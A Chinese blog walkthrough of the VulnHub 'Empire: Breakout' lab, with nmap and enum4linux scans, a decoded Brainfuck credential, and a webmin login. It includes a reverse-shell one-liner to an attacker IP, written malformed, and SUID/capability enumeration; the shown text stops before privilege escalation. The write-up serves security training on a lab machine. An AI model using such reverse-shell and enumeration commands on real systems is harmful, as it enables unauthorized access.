breakout

已于 2023-03-21 01:51:58 修改
阅读量149 收藏 1
点赞数
文章标签: 网络 linux
于 2023-03-20 17:38:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48514193/article/details/129672386
版权

breakout

靶场信息

Empire: Breakout ~ VulnHub

  • Filename: 02-Breakout.zip
  • File size: 1013 MB
  • MD5: C87BC1DB9BD51205B1E9EA441F8222AB
  • SHA1: 164DF36D136E5DA83FCCCF503D36A59B0D26E14A
信息收集阶段
1.使用 netdiscover 发现靶机地址

使用netdiscover -i eth0 发现靶场目标信息为192.168.86.138

2.使用nmap进行信息收集
nmap -Pn -sS --stats-every 3m --max-retries 1  --defeat-rst-ratelimit -T4 -p1-65535 -oN /home/kali/2.txt  192.168.86.138

Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-19 21:57 EDT
Nmap scan report for localhost (192.168.86.138)
Host is up (0.0016s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt
20000/tcp open  dnp
MAC Address: 00:0C:29:14:59:73 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.55 seconds

接下来,我们发现其开放的端口80,139,445,10000,20000 192.168.86.138 然后对于其后续的端口继续进行扫描

nmap -sV -p 80,139,445,10000,20000 192.168.86.138
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-19 22:15 EDT
Nmap scan report for 192.168.86.138
Host is up (0.00034s latency).

PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
MAC Address: 00:0C:29:14:59:73 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.48 seconds

然后对于其漏洞信息进行扫描

nmap -A -p80,139,445,10000,20000 192.168.86.138 --script=vuln 192.168.86.138

扫出来一堆漏洞这个不是靶场考察的重点顾咱们忽略

3.通过对于80端口进行信息收集

我们直到
80/tcp open http Apache httpd 2.4.51 ((Debian))
访问80端口发现

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rCmrqb4V-1679305071050)(E:\笔记本\图片\image-20230320105248475.png)]

然后 对其源码进行分析(这个一般靶场才有用)

发现其留下的线索
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

-->

对于密文进行解密

Brainfuck Language - Online Decoder, Translator, Interpreter (dcode.fr)

获得一下信息(可能是密钥)

.2uqPEfj3D<P'a-3
使用 dirsearch对于 80端口进行目录发现

dirsearch -u http://192.168.86.138:80

发现了一个地址,记录了apach的版本信息并未发现漏洞

通过

searchsploit apch 进行检索并未发现利用手段

使用enum4linux进行信息收集
enum4linux 192.168.86.138

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.86.138
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

|    Users on 192.168.86.138 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1683874020-4104641535-3793993001
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
#这里有一个用户名
S-1-22-1-1000 Unix User\cyber (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''


里面列举了很多信息,暂时我只提取了 smba版本,Usernames
可以通过searchsploit 进行搜索
通过收集的信息对于10000 20000 端口部署的服务

通过cyber + 密钥 登录到了20000端口的应用

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CVw0GP4D-1679305071051)(E:\笔记本\图片\image-20230320165534562.png)]

进入到这个界面后获得普通权限
反弹shell
bash -i /dev/tcp/192.168.86.132/4444 0>&1 2>&1

获得普通权限后进行信息收集
find / -type f -perm -u=s 2>/dev/null
#这里 find / 目录下 所有的文件  并且将报错信息 不显示并且输出到 linux 黑洞中(就是删了)

下一步通过ls-all输出文件信息

cyber@breakout:~$ ls -all
ls -all
total 572
drwxr-xr-x  8 cyber cyber   4096 Oct 20  2021 .
drwxr-xr-x  3 root  root    4096 Oct 19  2021 ..
-rw-------  1 cyber cyber    118 Mar 20 13:33 .bash_history
-rw-r--r--  1 cyber cyber    220 Oct 19  2021 .bash_logout
-rw-r--r--  1 cyber cyber   3526 Oct 19  2021 .bashrc
drwxr-xr-x  2 cyber cyber   4096 Oct 19  2021 .filemin
drwx------  2 cyber cyber   4096 Oct 19  2021 .gnupg
drwxr-xr-x  3 cyber cyber   4096 Oct 19  2021 .local
-rw-r--r--  1 cyber cyber    807 Oct 19  2021 .profile
drwx------  2 cyber cyber   4096 Oct 19  2021 .spamassassin
-rwxr-xr-x  1 root  root  531928 Oct 19  2021 tar
drwxr-xr-x  2 cyber cyber   4096 Oct 20  2021 .tmp
drwx------ 16 cyber cyber   4096 Oct 19  2021 .usermin
-rw-r--r--  1 cyber cyber     48 Oct 19  2021 user.txt

权限检查
cyber@breakout:~$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
cyber@breakout:~$

唐布啦
关注
Breakout
03-05
"Breakout"是一款经典的街机游戏,由Atari在1976年发布,由史蒂夫·乔布斯和斯蒂夫·沃兹尼亚克共同设计。游戏的基本概念是玩家控制一块挡板来反弹一个球,目标是消除屏幕上的一系列砖块。这款游戏对后来的许多游戏...
2021-01-21 SONiC系统管理16 端口扇出
weixin_44316184的博客
01-21 681
SONiC系统管理16 端口扇出 SONiC系统支持交换机端口的扇出功能。 端口扇出Breakout功能是指对交换机支持通过软件配置的方式把交换机的一个物理接口配置成单个单速率的接口或者多个低速率接口的功能。配置成多个低速率接口的模式需要满足多个低速率接口的带宽分配以端口的Lane速率为颗粒度,并且总速率不超过单端口情况下的速率。 例如一个100GE(4*25给)端口,通过Breakout成4个25GE端口,或者一个50GE端口加上两个25GE端口。 SONiC系统不支持运行中的动态修改Breakout模式
靶机练习 No.22 Vulnhub靶机 Breakout samba,webmin,tar提权
YouthBelief的博客
01-24 3889
0x00 环境准备 靶机下载 https://www.vulnhub.com/entry/empire-breakout,751/ 启动方式 VMware 启动 版本信息 Name: Empire: Breakout Date release: 21 Oct 2021 Author: icex64 & Empire Cybersecurity Series: Empire 靶机描述 Difficulty: Easy This box was created to be an E
网络监控之三:ifstat、iftop
weixin_34279579的博客
07-10 1186
介绍 ifstat工具是个网络接口监测工具,比较简单看网络流量   ifstat的安装使用: wget http://distfiles.macports.org/ifstat/ifstat-1.1.tar.gztar xzvf ifstat-1.1.tar.gzcd ifstat-1.1./configuremakemake install   实例 默认使用 #ifstat...
Linux 系统中如何查看日志 (常用命令)
jeikerxiao
08-23 5165
cat tail -f 日志文件 日 志 文 件 说 明 /var/log/message 系统启动后的信息和错误日志,是Red Hat Linux中最常用的日志之一 /var/log/secure 与安全相关的日志信息 /var/log/maillog 与邮件相关的日志信息 /var/log/cron 与定时任务相关的日志信息 /var/log/sp
linux查看端口相关命令
breakout_alex的博客
07-16 211
linux查看端口被哪个进程占用 1、lsof -i:端口号 2、netstat -tunlp|grep 端口号 查看服务器是否开放某端口 tcp端口:>netstat-ntpl udp端口:>netstat-nupl 常用参数: -a (all)显示所有选项,默认不显示LISTEN相关 -t (tcp)仅显示tcp相关选项 -u (udp)仅显示u...
vulnhub breakout
qq_62144749的博客
08-15 1320
1
Local breakout
qq_39500540的博客
03-09 3050
。 Home Routed漫游接入方式是目前2G/3G网络比较常用的路由方式,较为成熟,LTE漫游初期也建议采用Home Routed方式漫游,涉及DEA的接口为S6a接口。 Local Breakout漫游接入方式相对可以避免用户面迂回,节省传输,从而减少漫游业务的时延,给用户更好的业务体验,但是业务控制,策略控制以及计费相对复杂。 ...
漏洞复现------Webmin 远程命令执行漏洞(CVE-2019-15107)
Z_Grant的博客
09-23 7793
文章目录一,webmin简介二,漏洞概述三,漏洞复现(1)环境搭建(2)exp四,漏洞分析五,漏洞修复 一,webmin简介 什么是webmin Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一...
Linux网络】NAT技术
2301_79181030的博客
08-18 2400
当内部网络中的设备需要访问外部网络时,NAT设备会从公共IP地址池中分配一个公共IP地址给该设备,并建立映射关系。当内部网络中的设备需要访问外部网络时,NAT设备会将该设备的私有IP地址和端口号转换为一个公共IP地址和端口号,并将转换后的数据包发送至外部网络。外部网络返回的数据包经过NAT设备时,会被还原为原始的内部网络设备的私有IP地址和端口号,然后转发给内部网络设备。企业路由器通过NAT技术,将内部网络的私有IP地址转换为公共IP地址,以便员工能够远程访问企业内部资源。
《Cloud Native Data Center Networking》(云原生数据中心网络设计)读书笔记 -- 07数据中心的边缘
最新发布
梆子井欢喜坨的博客
08-21 353
本章将帮助你回答以下问题。
Modbus-TCP——Libmodbus安装和使用(Ubuntu22.04)
计算机硕士的博客
08-21 190
Modbus-TCP——Libmodbus安装和使用。
【qt】基于tcp的消息发送
yyqzjw的博客
08-18 289
我们需要实现客户端发消息,服务端接收消息。
迈威通信Wi-Fi无线交换机:让工业网络打破线缆束缚
Maiwe的博客
08-16 666
为了满足日益增长的无线通信需求,迈威通信专门设计了一款MISCOM7209W-3N25系列二层网管型全千兆双频Wi-Fi卡轨式工业无线PoE交换机,旗下有4款产品,为智能制造和工业互联网的深度融合提供了坚实的网络基石。
Linux网络设置
Lwc1027的博客
08-18 1212
根据pid查询5、查看端口查看网络配置的几个命令又ifconfig、hostname、route、netstat、ss,可以查看网卡,路由表还有统计信息,可以直接指定查询需要的指令。
Linux 软件编程学习第十五天
mxyzhy的博客
08-17 1340
Linux网络编程学习
RegFormer:用于大规模点云配准的高效投影感知Transformer网络
人工智能小白
08-18 753
2023年ICCV论文RegFormer的论文解读,点云配准工作背景,网络结构,实验分析
vulnhub靶场 breakout
08-29
EMPIRE: BREAKOUT是一个在VulnHub网站上提供的虚拟机靶场。你可以在VulnHub网站上搜索EMPIRE: BREAKOUT,并下载该靶场进行学习和实践。 VulnHub是一个提供各种虚拟机靶场的网站,旨在帮助人们学习和提升网络安全技能。在这个靶场中,你可以接触到加密方式和解密过程,对于第一次接触这种加密方式的人来说,可以使用在线站点来进行解密操作,提高对该加密方式的理解和熟悉度。 EMPIRE: BREAKOUT靶场是一个适合初学者的简单难度的靶场,对于计算机学习者来说,初期的学习往往是最迷茫和难以坚持的,但通过不断的学习和实践,经验和能力会得到提高。这个靶场可以帮助你探索和学习网络安全方面的知识和技能。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【VulnHub靶场】——EMPIRE: BREAKOUT](https://blog.csdn.net/qq_63844103/article/details/127028486)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值